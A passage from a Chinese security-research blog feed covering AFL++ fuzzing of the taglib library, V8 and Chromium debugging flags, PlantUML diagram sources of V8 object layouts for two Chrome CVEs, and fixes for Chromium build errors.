<p>AFL_CC_COMPILE=LTO 是指定 AFL++ 使用 LTO 模式进行插装（instrument）。此模式是官方推荐优先选择的插装模式，详情参考文档<a href="https://github.com/AFLplusplus/AFLplusplus/blob/stable/docs/fuzzing_in_depth.md"> fuzzing in depth </a>。</p>

<h2 id="corpus">Corpus</h2>

<p>有了 harness 还需要找支持的 Corpus(样本文件) 才能开始 Fuzzing，taglib 的单元测试中附带了几个文件，目前我就选择这几个文件作为种子样本。以后有时间了，还可以采用从 互联网（google，github）爬取更多的文件，毕竟 AFL++ 只是在做一些高度优化过的爆破，多搞一个样本应该还是会节省很多算力的。另外我目前只提取了其中的 MP3 文件，打算先专注 Fuzzing 一种文件格式，希望可以把算力集中在触发这种文件格式的解析代码路径上。</p>

<p>还有重要的一点是要对样本进行蒸馏（Corpus Distillation），Fuzzing 过程中会对每个进行逐字节/逐x位的处理，所以如果一个样本不能触发新的代码路径的话，把它加到种子中，反倒会降低 Fuzzing 的效率。AFL++ 提供了 afl-cmin、afl-tmin 来精简样本。afl-cmin 用来缩减样本数量，仅留下能触发不同代码路径的样本。afl-tmin 用来缩减样本体积，将样本裁剪成等价但是更小的文件。因为我的种子本来就是象征性的找了几个文件，数量体积都不大，我只是象征性的用 afl-cmin 处理了一下。如果以后真的用爬虫在互联网爬取样本的话，可以在爬取脚本后面接一个自动蒸馏的功能。</p>

<p>其实还有一个可选参数是字典，因为有些代码路径可能要文件内容符合正确的魔法数标识后才能进入，如果是单纯的去爆破，可能要花很长时间，如果有一个已知魔法数组成的字典，没准可以更快的触发到这些路径，但对于我选择的 LTO 插装模式来说，文档指出 AFL++ 会在编译过程中自动的识别并生成字典，我就没再关注这个参数了。</p>

<h2 id="启动-afl-fuzz">启动 afl-fuzz</h2>

<p>准备好上面的材料，就可以启动 afl-fuzz 试下效果了：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ afl-fuzz -i corpus-cmin -o fuzzout -- ./tagreader @@
</code></pre></div></div>

<ul>
  <li>输入文件夹是 corpus-cmin 里面存放了 afl-cmin 过滤好的样本</li>
  <li>输出文件夹是 fuzzout，AFL++ 会把 fuzzing 的状态，新样本等内容都存到这里</li>
  <li>– 用来之后是 harness 的命令行，@@ 占位符用来指代需要 AFL++ 替换成文件路径的部分</li>
</ul>

<p>看到 afl-fuzz 可以正常运行后，我们可以改进一下，利用好 afl++ 提供的多种功能。<a href="https://github.com/AFLplusplus/AFLplusplus/blob/stable/docs/fuzzing_in_depth.md#c-using-multiple-cores">官方推荐</a>的方式是使用 -M/-S 参数，利用主从模式开启多个 afl-fuzz，每个实例可以使用不同参数或是使用不同的构建选项的 harness，这样所有的实例之间会同步样本，互相配合扬长避短。</p>
<ul>
  <li>harness 开启不同的 sanitizer, 开启 sanitizer 会减慢运行速度，但是可以发现正常情况下不会触发崩溃的问题</li>
  <li>harness 使用 CMPLOG 选项编译，尝试自动解决魔法数/校验和的问题，详见 <a href="https://github.com/AFLplusplus/AFLplusplus/blob/stable/instrumentation/README.cmplog.md">README.cmdlog.md</a></li>
  <li>harness 使用 laf-intel 选项编译，采用不同的方案尝试解决魔法数的问题，详见 <a href="https://github.com/AFLplusplus/AFLplusplus/blob/stable/instrumentation/README.laf-intel.md">README.laf-intel.md</a></li>
  <li>尝试不同的文件突变算法</li>
</ul>

<p>我的 afl-fuzz 都跑在一个廉价单核 vps 上，CPU 算力不是很够用，勉强开了 4 个实例：</p>
<ul>
  <li>一个没有额外参数的主实例 <code class="language-plaintext highlighter-rouge">afl-fuzz -M master -i corpus-cmin -o fuzzout -- ./tagreader.lto.afl @@</code></li>
  <li>llvm 模式插装并开启 CMPLOG，这个是因为 taglib 在 lto 模式下开启 CMPLOG 编译会出错</li>
  <li>lto 模式开启 la-intel 的 harness</li>
  <li>lto 模式开启 ASAN 的 harness</li>
</ul>]]></content><author><name></name></author><summary type="html"><![CDATA[目前热度最高的漏洞挖掘方法应该就是 Fuzzing 了，本文记录我学习使用 AFL++ 来 Fuzzing 开源的音频文件标签处理库 taglib 的过程。]]></summary></entry><entry><title type="html">Chromium 和 v8 的一些参数（WIP)</title><link href="https://pwntips.github.io/2022/06/24/v8-parameters.html" rel="alternate" type="text/html" title="Chromium 和 v8 的一些参数（WIP)" /><published>2022-06-24T00:00:00+08:00</published><updated>2022-06-24T00:00:00+08:00</updated><id>https://pwntips.github.io/2022/06/24/v8-parameters</id><content type="html" xml:base="https://pwntips.github.io/2022/06/24/v8-parameters.html"><![CDATA[<h1 id="v8-参数">V8 参数</h1>

<h2 id="构建参数">构建参数</h2>

<ul>
  <li>v8_enable_snapshot_code_comments = false # 编译 builtins 函数时带上相应的注释，有助于我们调试时快速了解 builtins 函数的意义</li>
</ul>

<h2 id="调试函数">调试函数</h2>

<p>v8 提供了一些可以辅助调试的 Runtime 函数，命令行中指定 –allow-natives-syntax 后就可以在 JavaScript 代码中使用，常用的如下：</p>
<ul>
  <li>%DebugPrint()</li>
  <li>%SystemBreak()</li>
</ul>

<h3 id="jit-日志">JIT 日志</h3>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">--trace-turbo</span>
</code></pre></div></div>

<h2 id="chrome-命令参数">Chrome 命令参数</h2>

<p>上面的 v8 参数 Chrome 也是支持的，但是用法和给 d8 指定时有些区别：</p>

<ul>
  <li>v8 的参数要放到–js-flags=中，例如 chrome.exe –js-flags=”–trace-turbo”</li>
  <li>还要额外加上 –no-sandbox 参数，否则 v8 引擎所在的渲染进程是在沙箱中运行的，没法输出日志到控制台或者文件中</li>
  <li>需要指定 –enable-_logging_=stderr 参数，这样 chrome 才会把 %DebugPrint() 一类的输出，输出到进程所属控制台</li>
  <li>例如：在命令行执行  <code class="language-plaintext highlighter-rouge">chrome.exe --no-sandbox --enable-logging=stderr --js-flags="--help"</code> 之后会看到 v8 命令的帮助</li>
</ul>]]></content><author><name></name></author><summary type="html"><![CDATA[V8 参数]]></summary></entry><entry><title type="html">PlantUML 源码备份</title><link href="https://pwntips.github.io/2022/06/11/plantuml-source-code.html" rel="alternate" type="text/html" title="PlantUML 源码备份" /><published>2022-06-11T00:00:00+08:00</published><updated>2022-06-11T00:00:00+08:00</updated><id>https://pwntips.github.io/2022/06/11/plantuml-source-code</id><content type="html" xml:base="https://pwntips.github.io/2022/06/11/plantuml-source-code.html"><![CDATA[<p>本文用来备份博客中出现的 PlantUML 图的源码。</p>

<h2 id="cve-2021-30551">CVE-2021-30551</h2>

<pre><code class="language-plantuml-svg">@startuml
map transitions_1 {
corrupted_prop =&gt;
}

map transitions_2 {
corrupted_prop =&gt;
}

map map_1 {
transitions *-&gt; transitions_1
descriptors =&gt; [regular_prop]
}

map transitions_0 {
regular_prop =&gt;
}

map map_2 {
transitions *-&gt; transitions_2
descriptors =&gt; [regular_prop, corrupted_prop]
}

map object_1 {
map *-&gt; map_2
}

map map_3 {
transitions =&gt; null
descriptors =&gt; [regular_prop, corrupted_prop, corrupted_prop]
}

map object_2 {
map *-&gt; map_3
}

map map_0 {
transitions *-&gt; transitions_0
descriptors =&gt; []
}

transitions_0::regular_prop ==&gt; map_1
transitions_1::corrupted_prop ==&gt; map_2
transitions_2::corrupted_prop ==&gt; map_3
@enduml
</code></pre>

<pre><code class="language-plantuml-svg">@startuml

package deprecated {
map transitions_1 {
corrupted_prop =&gt;
}

map transitions_2 {
corrupted_prop =&gt;
}

map map_1 {
transitions *-&gt; transitions_1
descriptors =&gt; [regular_prop]
}

map map_2 {
transitions *-&gt; transitions_2
descriptors =&gt; [regular_prop, corrupted_prop]
}


map map_3 {
transitions =&gt; null
descriptors =&gt; [regular_prop, corrupted_prop, corrupted_prop]
}


transitions_1::corrupted_prop ==&gt; map_2
transitions_2::corrupted_prop ==&gt; map_3
}

map object_2 {
map *-&gt; deprecated.map_3
}

map transitions_3 {
regular_prop =&gt;
}

map transitions_4 {
corrupted_prop =&gt;
}

map transitions_5 {
corrupted_prop =&gt;
}

map map_4 {
transitions *-&gt; transitions_4
descriptors =&gt; [regular_prop]
}

map map_5 {
transitions *-&gt; transitions_5
descriptors =&gt; [regular_prop, corrupted_prop]
}

map map_6 {
transitions =&gt; null
descriptors =&gt; [regular_prop, corrupted_prop, corrupted_prop]
}

map map_0 {
transitions *-&gt; transitions_3
descriptors =&gt; []
}

map object_1 {
map *-&gt; map_6
}



transitions_3::regular_prop ==&gt; map_4
transitions_4::corrupted_prop ==&gt; map_5
transitions_5::corrupted_prop ==&gt; map_6
@enduml
</code></pre>

<h2 id="cve-2021-37975">CVE-2021-37975</h2>

<pre><code class="language-plantuml-svg">object k_0
object k_1
object k_2
object k_3

map retMap {
}

map m_3 {
k_2 =&gt;
}

map m_2 {
k_2 =&gt;
k_1 =&gt;
}

map m_1 {
k_1 =&gt;
k_0 =&gt;
}

map m_0 {
k_0 =&gt;
initKey =&gt;
}

map map1 {
initKey =&gt;
k_3 =&gt;
}

object initKey

map1::k_3 =&gt; retMap
map1::initKey ==&gt; m_0
m_0::k_0 ==&gt; m_1
m_1::k_1 ==&gt; m_2
m_2::k_2 ==&gt; m_3

m_0::initKey ==&gt; k_0
m_1::k_0 ==&gt; k_1
m_2::k_1 ==&gt; k_2
m_3::k_2 ==&gt; k_3
</code></pre>

<pre><code class="language-plantuml">@startuml

object k_0
object k_1
object k_2
object k_3

object k_5
object k_7
object k_9
object k_8

map m_8 {
k_8 =&gt;
}

map m_7 {
k_7 =&gt;
k_8 =&gt;
}

map m_5 {
k_3 =&gt;
}

object v9

map retMap {
k_5 =&gt;
k_3 =&gt;
}

map m_3 {
k_2 =&gt;
}

map m_2 {
k_2 =&gt;
k_1 =&gt;
}

map m_1 {
k_1 =&gt;
k_0 =&gt;
}

map m_0 {
k_0 =&gt;
initKey =&gt;
}

map map1 {
initKey =&gt;
k_3 =&gt;
k_7 =&gt;
k_9 =&gt;
}

object initKey

map1::k_3 =&gt; retMap
map1::initKey ==&gt; m_0
m_0::k_0 ==&gt; m_1
m_1::k_1 ==&gt; m_2
m_2::k_2 ==&gt; m_3

m_0::initKey ==&gt; k_0
m_1::k_0 ==&gt; k_1
m_2::k_1 ==&gt; k_2

m_3::k_2 ==&gt; k_3

map1::k_7 ==&gt; m_7
map1::k_9 ==&gt; v9

retMap::k_5 ==&gt; m_5
retMap::k_3 ==&gt; k_5

m_5::k_3 ==&gt; k_7
m_7::k_8 ==&gt; m_8
m_7::k_7 ==&gt; k_8

m_8::k_8 ==&gt; k_9

@enduml
</code></pre>

<pre><code class="language-plantuml">@startuml

object k_0
object k_1
object k_2
object k_3

object k_5
object k_7
object k_9
object k_8

object Roots

map m_8 {
k_8 =&gt;
}

map m_7 {
k_7 =&gt;
k_8 =&gt;
}

map m_5 {
k_3 =&gt;
}

object v9

map retMap {
k_5 =&gt;
k_3 =&gt;
}

map m_3 {
k_2 =&gt;
}

map m_2 {
k_2 =&gt;
k_1 =&gt;
}

map m_1 {
k_1 =&gt;
k_0 =&gt;
}

map m_0 {
k_0 =&gt;
initKey =&gt;
}

map map1 {
initKey =&gt;
k_3 =&gt;
k_7 =&gt;
k_9 =&gt;
}

object initKey

map1::k_3 =&gt; retMap : 5

map1::initKey ==&gt; m_0

m_0::k_0 ==&gt; m_1 : 8
m_0::initKey ==&gt; k_0 : 8

m_1::k_0 ==&gt; k_1 : 7
m_1::k_1 ==&gt; m_2 : 7

m_2::k_2 ==&gt; m_3 : 6
m_2::k_1 ==&gt; k_2 : 6

m_3::k_2 ==&gt; k_3 : 5

map1::k_7 ==&gt; m_7 : 3
map1::k_9 ==&gt; v9 : 0

retMap::k_5 ==&gt; m_5 : 4
retMap::k_3 ==&gt; k_5 : 4

m_5::k_3 ==&gt; k_7 : 3

m_7::k_8 ==&gt; m_8 : 2
m_7::k_7 ==&gt; k_8 : 2

m_8::k_8 ==&gt; k_9 : 1

Roots ==&gt; map1 : *
Roots ==&gt; initKey : *

k_9 o.. map1::k_9

k_8 o.. m_7::k_8
k_8 o.. m_8::k_8

k_7 o.. m_7::k_7
k_7 o.. map1::k_7

k_5 o.. retMap::k_5
k_3 o.. map1::k_3
k_3 o.. retMap::k_3
k_2 o.. m_3::k_2
k_1 o.. m_1::k_1
k_0 o.. m_0::k_0

initKey o.. map1::initKey

@enduml
</code></pre>]]></content><author><name></name></author><summary type="html"><![CDATA[本文用来备份博客中出现的 PlantUML 图的源码。]]></summary></entry><entry><title type="html">Chrome 构建错误</title><link href="https://pwntips.github.io/2022/06/08/chromium-build-error.html" rel="alternate" type="text/html" title="Chrome 构建错误" /><published>2022-06-08T00:00:00+08:00</published><updated>2022-06-08T00:00:00+08:00</updated><id>https://pwntips.github.io/2022/06/08/chromium-build-error</id><content type="html" xml:base="https://pwntips.github.io/2022/06/08/chromium-build-error.html"><![CDATA[<h2 id="lld-link-error-invalid-timestamp--2142000-expected-32-bit-integer">lld-link: error: invalid timestamp: -2142000. Expected 32-bit integer</h2>

<p>build\util\LASTCHANGE.committime 文件内容为 0 导致的。
此文件里记录的应该是从 git 日志中提取的上次 commit 的时间戳，如果获取失败了默认填入 0。
手工改成合理的时间戳( epoch ) 再重新执行 gn 即可。</p>

<h2 id="openssl-config-gailed-error25078067">openssl config gailed: error:25078067</h2>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FAILED: gen/chrome/browser/resources/settings/vulcanized.html gen/chrome/browser/resources/settings/lazy_load.vulcanized.html gen/chrome/browser/resources/settings/crisper.js gen/chrome/browser/resources/settings/lazy_load.crisper.js
d:/depot_tools/bootstrap-2@3_8_10_chromium_23_bin/python/bin/python.exe ../../chrome/browser/resources/optimize_webui.py --host settings --input gen/chrome/browser/resources/settings/settings_resources.unpak --out_folder gen/chrome/browser/resources/settings --depfile gen/chrome/browser/resources/settings/build.d --js_out_files crisper.js lazy_load.crisper.js --exclude chrome://resources/mojo/chromeos/services/network_config/public/mojom/cros_network_config.mojom.html --html_in_files settings.html lazy_load.html --html_out_files vulcanized.html lazy_load.vulcanized.html --insert_in_head "&lt;base href=\"chrome://settings\"&gt;"
Traceback (most recent call last):
  File "../../chrome/browser/resources/optimize_webui.py", line 363, in &lt;module&gt;
    main(sys.argv[1:])
  File "../../chrome/browser/resources/optimize_webui.py", line 346, in main
    manifest_out_path = _optimize(args.input, args)
  File "../../chrome/browser/resources/optimize_webui.py", line 300, in _optimize
    manifest_out_path, args, excludes)
  File "../../chrome/browser/resources/optimize_webui.py", line 273, in _bundle_v2
    '--js', os.path.join(tmp_out_dir, js_out_file)])
  File "..\..\third_party\node\node.py", line 27, in RunNode
    raise RuntimeError('%s failed: %s' % (cmd, stderr))
RuntimeError: ..\..\third_party\node\win\node.exe ..\..\third_party\node\node_modules\crisper\bin\crisper --source D:/chromium2/src/out/CVE-2020-6418/gen/chrome/browser/resources/settings/bundled\settings.html --script-in-head false --html D:/chromium2/src/out/CVE-2020-6418/gen/chrome/browser/resources/settings/bundled\vulcanized.html --js D:/chromium2/src/out/CVE-2020-6418/gen/chrome/browser/resources/settings/bundled\crisper.js failed: openssl config failed: error:25078067:DSO support routines:win32_load:could not load the shared library
</code></pre></div></div>

<p>出现这个错误是因为设置了 <code class="language-plaintext highlighter-rouge">OPENSSL_CONF</code> 环境变量，把这个环境变量置空可以解决。</p>]]></content><author><name></name></author><summary type="html"><![CDATA[lld-link: error: invalid timestamp: -2142000. Expected 32-bit integer]]></summary></entry></feed>